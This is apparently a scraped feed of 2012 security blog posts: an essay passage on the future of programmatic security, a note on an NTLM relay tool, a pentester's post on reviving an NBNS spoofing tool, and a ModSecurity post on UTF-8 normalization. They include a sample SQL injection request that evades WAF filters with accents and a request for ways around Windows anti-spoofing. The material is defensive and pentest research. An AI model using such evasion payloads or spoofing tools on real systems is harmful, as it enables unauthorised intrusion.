Our tradition in security is to focus on the risks of these advances, but the more prescient among us are looking at the massive opportunities. Not that we can ignore the risks, but we won’t merely be defending these advances – our security will be defined and delivered by them. When I talk about security automation and abstraction I am not merely paying lip service to buzzwords – I honestly expect them to support new capabilities we can barely imagine today.<br />
<br />
When we leverage these tools – and we will – we move past our current static security model that relies (mostly) on following wires and plugs, and into a realm of <em>programmatic security</em>. Or, if you prefer, <em>Software Defined Security</em>. Programmers, not network engineers, become the dominant voices in our profession.<br />
<br />
<hr /><br />
Concurrently, four native security trends are poised to upend existing practice models.<br />
<br />
Today we focus tremendous effort on an infinitely escalating series of vulnerabilities and exploits. We have started to mitigate this somewhat with anti-exploitation, especially at the operating system level (thanks to Microsoft). The future of anti-exploitation is <em>hyper segregation</em>.<br />
<br />
iOS is an excellent example of the security benefits of heavily sandboxing the operating ecosystem. Emerging tools like Bromium and Invincea are applying even more advanced virtualization techniques to the same problem. Bromium goes so far as to effectively virtualize and isolate at a <em>per task</em> level. Calling this mere ‘segregation’ is trite at best.<br />
<br />
Cloud enables similar techniques at the network and application levels. When the network and infrastructure are defined in software, there is essentially zero capital cost for network and application component segregation. Even this blog, today, runs on a specially configured hyper-segregated server that’s managed at a per-process level.<br />
<br />
Hyper segregated environments – down, in some cases, to the individual process level – are rapidly becoming a practical reality, even in complex business environments with low tolerance for restriction.<br />
<br />
<hr /><br />
Although <em>incident response</em> has always technically been core to any security model, for the most part it was shoved to the back room – stuck at the kids’ table next to DRM, application security, and network segregation. No one wanted to make the case that no matter what we spent, our defenses could never <em>eliminate</em> risk. Like politicians, we were too frightened to tell our executives (our constituency) the truth. Especially those who were burned by ideological execs.<br />
<br />
Thanks to our friends in China and Eastern Europe (mostly), incident response is on the earliest edge of getting its due. Not the simple expedient of having an incident response plan, or even tools, but conceptually re-prioritizing and re-architecting our entire security programs – to focus as much or more on detection and response as on pure defense. We will finally use all those big screens hanging in the SOC to do more than impress prospects and visitors.<br />
<br />
My bold prediction? A focus on incident response, on more rapidly detecting and responding to attacker-driven incidents, will exceed our current checklist and vulnerability focused security model, affecting everything from technology decisions to budgeting and staffing.<br />
<br />
This doesn’t mean compliance will go away – over the long haul compliance standards will embrace this approach out of necessity.<br />
<br />
<hr /><br />
The next two trends technically fall under the umbrella of response, but only in the broadest use of the term.<br />
<br />
As I <a href="https://securosis.com/blog/thoughts-on-active-defense-intrusion-deception-and-counter-strikes">wrote earlier this year</a>, <em>active defense</em> is reemerging and poised to materially impact our ability to detect and manage attacks. Historically we have said that as defenders we will <em>always</em> lose – because we need to be right every time, and the attacker only needs to be right or lucky once. But that’s only true for the most simplistic definition of attack. If we look at the <a href="https://securosis.com/blog/the-data-breach-triangle/">Data Breach Triangle</a>, an attacker not only needs a way in, but something to steal and a way out.<br />
<br />
Active defense reverses the equation and forces attacker perfection, making accessing our environment only one of many steps required for a successful attack. Instead of relying on out-of-date signatures, crappy heuristics prone to false positives, or manual combing through packets and logs, we will instead build environments so laden with tripwires and landmines that they may end up being banned by a virtual Geneva Convention.<br />
<br />
Heuristic security tends to fail because it often relies on generic analysis of good and bad behavior that is difficult or impossible to model. Active defenses interact with intruders while complicating and obfuscating the underlying structure. This dynamic interaction is far more likely to properly identify and classify an attacker.<br />
<br />
Active defenses will become commonplace, and in large part replace our signature-based systems of failure.<br />
<br />
<hr /><br />
But none of this information is useful if it isn’t accurate, actionable, and appropriate, so the last major trend is <em>closing the action loop</em> (the <a href="http://en.wikipedia.org/wiki/OODA_loop">OODA loop</a> for you milspec readers). This combines <em>big data,</em> <em>visualization,</em> and <em>security orchestration</em> (a facet of our earlier automation) – to create a more responsive, manageable, and, frankly, <em>usable</em> security system.<br />
<br />
Our current tools largely fall into general functional categories that are too distinct and isolated to really meet our needs. Some tools observe our environment (<em>e.g.,</em> SIEM, DLP, and full packet capture), but they tend to focus on narrow slices – with massive gaps between tools hampering our ability to acquire related information which we need to understand incidents. From an alert, we need to jump into many different shells and command lines on multiple servers and appliances in order to see what’s really going on. When tools talk to each other, it’s rarely in a meaningful and useful way.<br />
<br />
While some tools can act with automation, it is again self-contained, uncoordinated, and (beyond the most simplistic incidents) more prone to break a business process than stop an attacker. When we want to perform a manual action, our environments are typically so segregated and complicated that we can barely manage something as simple as pushing a temporary firewall rule change.<br />
<br />
Over the past year I have seen the emergence of tools just beginning to deliver on old dreams, which were so shattered by the ugly reality of SIEM that many security managers have resorted to curling up in the fetal position during vendor presentations.<br />
<br />
These tools will combine the massive amounts of data we are currently collecting on our environments, at speeds and volumes long promised but never realized. We will steal analytics from big data; tune them for security; and architect systems that allow us to visualize our security posture, identify, and rapidly characterize incidents. From the same console we will be able to look at a high-level SIEM alert, drill down into the specifics, and analyze correlated data from multiple tools and sensors. I don’t merely mean the SNMP traps from those tools, but full incident data and <em>context</em>.<br />
<br />
No, your current SIEM doesn’t do this.<br />
<br />
But the clincher is the closer. Rather than merely looking at incident data, we will act on the data using the same console. We will review the automated responses, model the impact with additional analytics and visualization (real-time attack and defense modeling, based on near-real-time assessment data), and then tune and implement additional actions to contain, stop, and investigate the attack.<br />
<br />
Detection, investigation, analysis, orchestration, and action all from the same console.<br />
<br />
<hr /><br />
This future won’t be distributed evenly. Organizations of different sizes and markets won’t all have the same access to these resources and they do not have the same needs – and that’s okay. Smaller and medium-sized organizations will rely more on Security as a Service providers and automated tools. Larger organizations or those less willing to trust outsiders will rely more on their own security operators. But these delivery models don’t change the fundamentals of technologies and processes.<br />
<br />
Within 10 years our security will be abstracted and managed programmatically. We will focus more on detection and response – relying on powerful new tools to identify, analyze, and orchestrate responses to attacks. The cost of attacking will rise dramatically due to hyper segregation, active countermeasures, and massive increases in the complexity required for a successful attack chain.<br />
<br />
I am not naive or egotistical enough to think these broad generalities will result in a future exactly as I envision it, or on the precise timeline I envision, but all the pieces are in at least early stages today, and the results seem inevitable.<br />
<br />
- Rich<br />
(1) <a href="https://securosis.com/blog/inflection">Comments</a>Kiran Vangavetihttp://www.blogger.com/profile/16789033014764600040noreply@blogger.comtag:blogger.com,1999:blog-9013159124343782843.post-38551145901073697922012-09-04T05:26:00.001-07:002012-09-04T05:26:36.876-07:00ZackAttack!: Firesheep for NTLM Authentication!<a href="http://feedproxy.google.com/~r/PenTestIT/~3/RTtamHWBPeY/">ZackAttack!: Firesheep for NTLM Authentication!</a>: Not BlackHat, but a goodie from the Defcon this time! What Firesheep was for HTTP, ZackAttack! aims to be for NTLM authentication! Simply put, ZackAttack! is a new toolset to perform NTLM authentication relaying. NTLM is pretty much prevalent in the corporate environment. Think of all that you can leverage using ZackAttack! It uses another tool – [...]<br />
<a href="http://www.pentestit.com/zackattack-firesheep-ntlm-authentication/">ZackAttack!: Firesheep for NTLM Authentication!</a> is a post from: <a href="http://www.pentestit.com/">PenTestIT</a><br />
<div><a href="http://feeds.feedburner.com/~ff/PenTestIT?a=RTtamHWBPeY:4I5XgJbs4wA:yIl2AUoC8zA"><img border="0" src="http://feeds.feedburner.com/~ff/PenTestIT?d=yIl2AUoC8zA" /></a> <a href="http://feeds.feedburner.com/~ff/PenTestIT?a=RTtamHWBPeY:4I5XgJbs4wA:F7zBnMyn0Lo"><img border="0" src="http://feeds.feedburner.com/~ff/PenTestIT?i=RTtamHWBPeY:4I5XgJbs4wA:F7zBnMyn0Lo" /></a> <a href="http://feeds.feedburner.com/~ff/PenTestIT?a=RTtamHWBPeY:4I5XgJbs4wA:V_sGLiPBpWU"><img border="0" src="http://feeds.feedburner.com/~ff/PenTestIT?i=RTtamHWBPeY:4I5XgJbs4wA:V_sGLiPBpWU" /></a></div><img height="1" src="http://feeds.feedburner.com/~r/PenTestIT/~4/RTtamHWBPeY" width="1" />Kiran Vangavetihttp://www.blogger.com/profile/16789033014764600040noreply@blogger.comtag:blogger.com,1999:blog-9013159124343782843.post-10844299588357824172012-09-04T05:22:00.001-07:002012-09-04T05:22:03.004-07:00Old School On-target NBNS Spoofing<a href="http://feedproxy.google.com/~r/Room362com/~3/MKnLEYbPMUs/old-school-on-target-nbns-spoofing.html">Old School On-target NBNS Spoofing</a>: <br />
One of pen testers favorite attacks is NBNS spoofing. Now Wesley who I originally learned this attack from, traced this back to sid (<a href="http://www.notsosecure.com/folder2/2007/03/14/abusing-tcpip-name-resolution-in-windows-to-carry-out-phishing-attacks/">http://www.notsosecure.com/folder2/2007/03/14/abusing-tcpip-name-resolution-in-windows-to-carry-out-phishing-attacks/</a>) . Wesley's stuff can be found here: <a href="http://www.mcgrewsecurity.com/tools/nbnspoof/">http://www.mcgrewsecurity.com/tools/nbnspoof/</a><br />
Wesley's stuff eventually lead to this awesome post on the Packetstan blog: <a href="http://www.packetstan.com/2011/03/nbns-spoofing-on-your-way-to-world.html">http://www.packetstan.com/2011/03/nbns-spoofing-on-your-way-to-world.html</a><br />
and in that post the Metasploit module to do it all is demoed. But there in lies the rub. With each degree of separation we have more and more solidified in into a "on-site" only attack. But if you read through Sid's paper from 2007 this doesn't have to be the case. He uses a tool written by "Francis Hauguet" back in 2005 for the Honeynet project: <a href="http://seclists.org/honeypots/2005/q4/46">http://seclists.org/honeypots/2005/q4/46</a> called "FakeNetbiosDGM and FakeNetbiosNS".<br />
Finding the tools was no easy task though, googling for the file name, the author or the project just netted me this link:<br />
<a href="http://honeynet.rstack.org/tools/FakeNetBIOS-0.91.zip">http://honeynet.rstack.org/tools/FakeNetBIOS-0.91.zip</a><br />
Gotta love the Wayback Machine, I finally found it here: <a href="http://wayback.archive.org/web/*/http://honeynet.rstack.org/tools/FakeNetBIOS-0.91.zip">http://wayback.archive.org/web/*/http://honeynet.rstack.org/tools/FakeNetBIOS-0.91.zip</a><br />
and eventually also here: <a href="http://www.chambet.com/tools.html">http://www.chambet.com/tools.html</a><br />
Question is, does it still work?? 2nd Question, how well does it work through/with Meterpreter?<br />
(As a side note, I haven't tried, but you might be able to use Py2Exe or PyInstaller to run nbnspoof.py on a windows box)<br />
When running it on XP SP3 I get the following<br />
<img alt="Screen Shot 2012 09 02 at 12 24 44 AM" border="0" height="499" src="http://www.room362.com/resource/Screen%20Shot%202012-09-02%20at%2012.24.44%20AM.png?fileId=20103536" title="Screen Shot 2012-09-02 at 12.24.44 AM.png" width="600" /><br />
Booooooooo, and on Windows 7 I get this:<br />
<img alt="Screen Shot 2012 09 02 at 12 29 03 AM" border="0" height="563" src="http://www.room362.com/resource/Screen%20Shot%202012-09-02%20at%2012.29.03%20AM.png?fileId=20103537" title="Screen Shot 2012-09-02 at 12.29.03 AM.png" width="600" /><br />
Ok, error 10013 is a permissions issue, I can deal with that..<br />
<img alt="Screen Shot 2012 09 02 at 12 32 38 AM" border="0" height="556" src="http://www.room362.com/resource/Screen%20Shot%202012-09-02%20at%2012.32.38%20AM.png?fileId=20103538" title="Screen Shot 2012-09-02 at 12.32.38 AM.png" width="600" /><br />
Run as Administrator it works! But something is wrong with the communication because the host doing the lookup doesn't get the correct resolution back.<br />
From what I can google it looks as though Windows Firewall has an 'Anti-Spoofing' outbound filter, so these "Bytes sent" don't even make it to Wireshark.<br />
I have created a Github repository, stuck the contents of the zip file in it and this is where I ask for help. If you know 1) how to disable the Windows Anti-spoofing filter or 2) How to circumvent it please leave a comment here, and issue on the repo or email me directly.<br />
The other thing is, if you want to improve the code, that would be awesome too, submit a pull request, I'd love to get this thing going again and make it into something that we can solidly use over a Meterpreter session.<br />
Github repo: <a href="https://github.com/mubix/FakeNetBIOS">https://github.com/mubix/FakeNetBIOS</a><br />
And if the only commit to this repo 5 years from now is "Initial commit" then at the very least it will be some where the next blogger who picks up the trail can get it from.<br />
P.S. If you know how to solve the issue on XP, that would be an awesome fix as well.<br />
<div><a href="http://feeds.feedburner.com/~ff/Room362com?a=MKnLEYbPMUs:f_8B7TaZJBw:yIl2AUoC8zA"><img border="0" src="http://feeds.feedburner.com/~ff/Room362com?d=yIl2AUoC8zA" /></a> <a href="http://feeds.feedburner.com/~ff/Room362com?a=MKnLEYbPMUs:f_8B7TaZJBw:V_sGLiPBpWU"><img border="0" src="http://feeds.feedburner.com/~ff/Room362com?i=MKnLEYbPMUs:f_8B7TaZJBw:V_sGLiPBpWU" /></a> <a href="http://feeds.feedburner.com/~ff/Room362com?a=MKnLEYbPMUs:f_8B7TaZJBw:gIN9vFwOqvQ"><img border="0" src="http://feeds.feedburner.com/~ff/Room362com?i=MKnLEYbPMUs:f_8B7TaZJBw:gIN9vFwOqvQ" /></a> <a href="http://feeds.feedburner.com/~ff/Room362com?a=MKnLEYbPMUs:f_8B7TaZJBw:7Q72WNTAKBA"><img border="0" src="http://feeds.feedburner.com/~ff/Room362com?d=7Q72WNTAKBA" /></a> <a href="http://feeds.feedburner.com/~ff/Room362com?a=MKnLEYbPMUs:f_8B7TaZJBw:F7zBnMyn0Lo"><img border="0" src="http://feeds.feedburner.com/~ff/Room362com?i=MKnLEYbPMUs:f_8B7TaZJBw:F7zBnMyn0Lo" /></a> <a href="http://feeds.feedburner.com/~ff/Room362com?a=MKnLEYbPMUs:f_8B7TaZJBw:I56M4DFLkF8"><img border="0" src="http://feeds.feedburner.com/~ff/Room362com?i=MKnLEYbPMUs:f_8B7TaZJBw:I56M4DFLkF8" /></a></div><img height="1" src="http://feeds.feedburner.com/~r/Room362com/~4/MKnLEYbPMUs" width="1" />Kiran Vangavetihttp://www.blogger.com/profile/16789033014764600040noreply@blogger.comtag:blogger.com,1999:blog-9013159124343782843.post-36467628918869028582012-08-29T14:19:00.001-07:002012-08-29T14:19:59.265-07:00WAF Normalization and I18N<a href="http://feedproxy.google.com/~r/SpiderlabsAnterior/~3/Tp_iEBAoxjA/waf-normalization-and-i18n.html">WAF Normalization and I18N</a>: <br />
<div><em>Submitted By Breno Silva Pinto and Ryan Barnett</em><br />
<h1>WAF Normalization and I18N</h1>Web application firewalls must be able to handle Internationaliztion (I18N) and thus properly handle various data encodings including Unicode and UTF-8 in order to prevent not only evasion issues but also to minimize false positives. In an earlier blog post, we highlighted ModSecurity's <a href="http://blog.spiderlabs.com/2011/06/modsecurity-advanced-topic-of-the-week-unicode-mapping-support.html">new support for Unicode mapping and decoding</a>. This capability helps us to more accurately decode characters from different Unicode code points. While this certainly helps our accuracy, we still had the issue of UTF-8 encodings.. This is a challenge for any WAF as it must be able to handle UTF-8 encodings of characters for different languages such as Portuquese. So, if you are running ModSecurity to protect a non-English language website then this blog post is for you! We introduce a new transformation function called <a href="https://sourceforge.net/apps/mediawiki/mod-security/index.php?title=Reference_Manual#utf8toUnicode">utf8toUnicode</a> that helps to normalize data for inspection.<br />
<br />
<h1>Incorrect UTF-8 Decoding</h1>We have received some <a href="http://lists.owasp.org/pipermail/owasp-modsecurity-core-rule-set/2012-August/001164.html">recent reports of false positive issues</a> with the <a href="https://www.owasp.org/index.php/Category:OWASP_ModSecurity_Core_Rule_Set_Project">OWASP ModSecurity CRS</a> that were due to existence of UTF-8 encoded characters. As an example, the Portuguese language has many "special" characters with different accent characters. For example:<br />
<br />
<pre><strong>1- </strong><strong>á Á ã Ã â Â à À</strong><strong>
2- </strong>é É ê Ê í Í<strong>
3- </strong>ó Ó õ Õ ô Ô<strong>
4- </strong>ú Ú ü Ü<strong>
5- </strong>ç Ç </pre>When these characters are UTF-8 encoded, they use multiple bytes. As an example, the "ę" character is encoded as "%c4%99". If ModSecurity only applies the standard t:urlDecodeUni, it will decode each byte individually which results in an impedance mismatch. In this case, this incorrect decoding resulted in a false positive match against some SQL Injection rules in the OWASP ModSecurity CRS. While this is a bit of a pain, it is not as bad as a <a href="http://intruders.org.br/artigos/waf_bypass_regex.pdf">false negative bypass situation that may be caused by this type of incorrect decoding</a>. Let's look an this type of SQL Injection evasion issue. What if we send the following request:<br />
<pre>http://172.16.51.132/index.php?foo=’úníón+séléct+data+fróm+námés</pre>Let's see how ModSecurity will decode this data when checking for an example SQL Injection keyword:<br />
<pre><strong>Recipe:</strong> Invoking rule 21b67e38;
Rule 21b67e38: SecRule "ARGS:foo"
"@rx select"
"phase:2,log,auditlog,pass,id:1111,t:urlDecodeUni"
T (0) <strong>urlDecodeUni:</strong>
"'<strong>\xc3\xban\xc3\xad\xc3\xb3n s\xc3\xa9l\xc3\xa9ct
data fr\xc3\xb3m n\xc3\xa1m\xc3\xa9s</strong>"
Transformation completed in 13 usec.
Executing operator "rx" with
param "select" against ARGS:foo.
Target value:
"'\xc3\xban\xc3\xad\xc3\xb3n s\xc3\xa9l\xc3\xa9ct data fr\xc3\xb3m
n\xc3\xa1m\xc3\xa9s"
Operator completed in 7 usec.<strong>
Rule
returned 0</strong>.</pre><div style="text-align: justify;">As you can see above the character sequence “<strong>úníón+séléct+data+fróm+námés</strong>“ was handled by the engine as<strong> “\xc3\xban\xc3\xad\xc3\xb3n<br />
s\xc3\xa9l\xc3\xa9ct data fr\xc3\xb3m n\xc3\xa1m\xc3\xa9s”. </strong>However the rule<br />
was looking for the pattern “<strong>select</strong>”. So, what happen if the application applies best-fit mapping conversions and removes the accents before sending the data to<br />
the database ? This may allow the payload to bypass our signatures.</div><h1>Utf8 to Unicode Mapping</h1>In order to better handle this data, we should first map the UTF-8 encoded data to Unicode and then use the unicode point mapping capabilities mentioned at the beginning of the blog post. This configuration is achieved by first setting the <a href="https://sourceforge.net/apps/mediawiki/mod-security/index.php?title=Reference_Manual#SecUnicodeCodePage">SecUnicodeCodePage</a> and <a href="https://sourceforge.net/apps/mediawiki/mod-security/index.php?title=Reference_Manual#SecUnicodeMapFile">SecUnicodeMapFile</a> directives in your main ModSecurity configuration file:<br />
<pre>SecUnicodeCodePage 20127
SecUnicodeMapFile /etc/apache2/unicode.mapping
</pre>The SecUnicodeCodePage directive sets the proper Unicode code point used for your site. The example 20127 is the US-ASCII code point. The SecUnicodeMapFile poinst to the <a href="http://mod-security.svn.sourceforge.net/viewvc/mod-security/m2/trunk/unicode.mapping">unicode.mapping file that comes with the ModSecurity source archive </a>and includes all of the Unicode conversions. Here is an example of the 20127 (US-ASCII) mapping data:<br />
<pre><strong>20127 (US-ASCII)</strong>
00a0:20 00a1:21 00a2:63 00a4:24 00a5:59 00a6:7c 00a9:43 00aa:61
00ab:3c 00ad:2d 00ae:52 00b2:32 00b3:33 00b7:2e 00b8:2c 00b9:31 00ba:6f 00bb:3e
00c0:41 00c1:41 00c2:41 00c3:41 00c4:41 00c5:41 00c6:41 00c7:43 00c8:45 00c9:45
00ca:45 00cb:45 00cc:49 00cd:49 00ce:49 00cf:49 00d0:44 00d1:4e 00d2:4f 00d3:4f
00d4:4f 00d5:4f 00d6:4f 00d8:4f 00d9:55 00da:55 00db:55 00dc:55 00dd:59 00e0:61
00e1:61 00e2:61 <strong>00e3:61</strong> 00e4:61
00e5:61 00e6:61 <strong>00e7:63</strong> 00e8:65
00e9:65 00ea:65 00eb:65 00ec:69 00ed:69 00ee:69 00ef:69 00f1:6e 00f2:6f 00f3:6f
00f4:6f 00f5:6f 00f6:6f 00f8:6f 00f9:75 00fa:75 00fb:75 00fc:75 00fd:79 00ff:79
0100:41 0101:61 0102:41 0103:61 0104:41 0105:61 0106:43 0107:63 0108:43 0109:63
010a:43 010b:63 010c:43 010d:63 010e:44 010f:64 0110:44 0111:64 0112:45 0113:65
0114:45 0115:65 0116:45 0117:65 0118:45 0119:65 011a:45 011b:65 011c:47 011d:67
011e:47 011f:67 0120:47 0121:67 0122:47 0123:67 0124:48 0125:68 0126:48 0127:68
0128:49 0129:69 012a:49 012b:69 012c:49 012d:69 012e:49 012f:69 0130:49 0131:69
0134:4a 0135:6a 0136:4b 0137:6b 0139:4c 013a:6c 013b:4c 013c:6c 013d:4c 013e:6c
0141:4c 0142:6c 0143:4e 0144:6e 0145:4e 0146:6e 0147:4e 0148:6e 014c:4f 014d:6f
014e:4f 014f:6f 0150:4f 0151:6f 0152:4f 0153:6f 0154:52 0155:72 0156:52 0157:72
0158:52 0159:72 015a:53 015b:73 015c:53 015d:73 015e:53 015f:73 0160:53 0161:73
0162:54 0163:74 0164:54 0165:74 0166:54 0167:74 0168:55 0169:75 016a:55 016b:75
016c:55 016d:75 016e:55 016f:75 0170:55 0171:75 0172:55 0173:75 0174:57 0175:77
0176:59 0177:79 0178:59 0179:5a 017b:5a 017c:7a 017d:5a 017e:7a 0180:62 0189:44
0191:46 0192:66 0197:49 019a:6c 019f:4f 01a0:4f 01a1:6f 01ab:74 01ae:54 01af:55
01b0:75 01b6:7a 01cd:41 01ce:61 01cf:49 01d0:69 01d1:4f 01d2:6f 01d3:55 01d4:75
01d5:55 01d6:75 01d7:55 01d8:75 01d9:55 01da:75 01db:55 01dc:75 01de:41 01df:61
01e4:47 01e5:67 01e6:47 01e7:67 01e8:4b 01e9:6b 01ea:4f 01eb:6f 01ec:4f 01ed:6f
01f0:6a 0261:67 02b9:27 02ba:22 02bc:27 02c4:5e 02c6:5e 02c8:27 02cb:60 02cd:5f
02dc:7e 0300:60 0302:5e 0303:7e 030e:22 0331:5f 0332:5f 2000:20 2001:20 2002:20
2003:20 2004:20 2005:20 2006:20 2010:2d 2011:2d 2013:2d 2014:2d 2018:27 2019:27
201a:2c 201c:22 201d:22 201e:22 2022:2e 2026:2e 2032:27 2035:60 2039:3c 203a:3e
2122:54 ff01:21 ff02:22 ff03:23 ff04:24 ff05:25 ff06:26 ff07:27 ff08:28 ff09:29
ff0a:2a ff0b:2b ff0c:2c ff0d:2d ff0e:2e ff0f:2f ff10:30 ff11:31 ff12:32 ff13:33
ff14:34 ff15:35 ff16:36 ff17:37 ff18:38 ff19:39 ff1a:3a ff1b:3b ff1c:3c ff1d:3d
ff1e:3e ff20:40 ff21:41 ff22:42 ff23:43 ff24:44 ff25:45 ff26:46 ff27:47 ff28:48
ff29:49 ff2a:4a ff2b:4b ff2c:4c ff2d:4d ff2e:4e ff2f:4f ff30:50 ff31:51 ff32:52
ff33:53 ff34:54 ff35:55 ff36:56 ff37:57 ff38:58 ff39:59 ff3a:5a ff3b:5b ff3c:5c
ff3d:5d ff3e:5e ff3f:5f ff40:60 ff41:61 ff42:62 ff43:63 ff44:64 ff45:65 ff46:66
ff47:67 ff48:68 ff49:69 ff4a:6a ff4b:6b ff4c:6c ff4d:6d ff4e:6e ff4f:6f ff50:70
ff51:71 ff52:72 ff53:73 ff54:74 ff55:75 ff56:76 ff57:77 ff58:78 ff59:79 ff5a:7a
ff5b:7b ff5c:7c ff5d:7d ff5e:7e</pre>With these Unicode mapping directives in place, we now can use the new t:utf8toUnicode transformation function which was just added to the v2.7.0 code. Here is a new example rule:<br />
<pre>SecRule "ARGS:foo" "@rx select" "phase:2,log,auditlog,pass,id:1111,<span style="background-color: yellow;"><strong>t:utf8toUnicode,t:urlDecodeUni</strong></span>"</pre>Let’s see how ModSecurity will handle the same request, but now<br />
using the mentioned features:<br />
<br />
<pre><strong>Recipe:</strong> Invoking rule 21717d58;
Rule 21717d58: SecRule "ARGS:foo"
"@rx select"
"phase:2,log,auditlog,pass,id:1111,t:utf8toUnicode,t:urlDecodeUni"
T (0) <strong>Utf8toUnicode</strong>:
"'<strong>%u00fan%u00ed%u00f3n
s%u00e9l%u00e9ct data fr%u00f3m n%u00e1m%u00e9s"</strong>
T (0) <strong>urlDecodeUni</strong>:
"<strong>'union select data from names</strong>"
Transformation completed in 29 usec.
Executing operator "rx" with
param "select" against ARGS:foo.
Target value: "'union select data from
names"
Operator completed in 16 usec.
Warning. Pattern match "select"
at ARGS:foo.<strong>
Rule
returned 1.</strong>
</pre>As you can see, the sequence “<strong>úníón+séléct+data+fróm+names” </strong>is now normalized to<strong> “union select data from names”</strong> and thus the rule matched. Summarizing the engine steps for data<br />
normalization:<br />
<ol><li>Attacker input: úníón+séléct+data+fróm+names.</li>
<li>Input in UTF-8 format: \xc3\xban\xc3\xad\xc3\xb3n s\xc3\xa9l\xc3\xa9ct data<br />
fr\xc3\xb3m n\xc3\xa1m\xc3\xa9s</li>
<li>Input in Unicode format: %u00fan%u00ed%u00f3n s%u00e9l%u00e9ct data fr%u00f3m<br />
n%u00e1m%u00e9s </li>
<li>Input in ASCII format: union select data from names</li>
</ol><div style="text-align: justify;">With this new UTF-8 and Unicode mapping and decoding support, ModSecurity can now more accurately normalize data from<br />
non-english languages which results in better rule accuracy.</div></div><div><a href="http://feeds.feedburner.com/~ff/SpiderlabsAnterior?a=Tp_iEBAoxjA:laJSo2x8w2U:yIl2AUoC8zA"><img border="0" src="http://feeds.feedburner.com/~ff/SpiderlabsAnterior?d=yIl2AUoC8zA" /></a> <a href="http://feeds.feedburner.com/~ff/SpiderlabsAnterior?a=Tp_iEBAoxjA:laJSo2x8w2U:qj6IDK7rITs"><img border="0" src="http://feeds.feedburner.com/~ff/SpiderlabsAnterior?d=qj6IDK7rITs" /></a> <a href="http://feeds.feedburner.com/~ff/SpiderlabsAnterior?a=Tp_iEBAoxjA:laJSo2x8w2U:V_sGLiPBpWU"><img border="0" src="http://feeds.feedburner.com/~ff/SpiderlabsAnterior?i=Tp_iEBAoxjA:laJSo2x8w2U:V_sGLiPBpWU" /></a></div><img height="1" src="http://feeds.feedburner.com/~r/SpiderlabsAnterior/~4/Tp_iEBAoxjA" width="1" />Kiran Vangavetihttp://www.blogger.com/profile/16789033014764600040noreply@blogger.com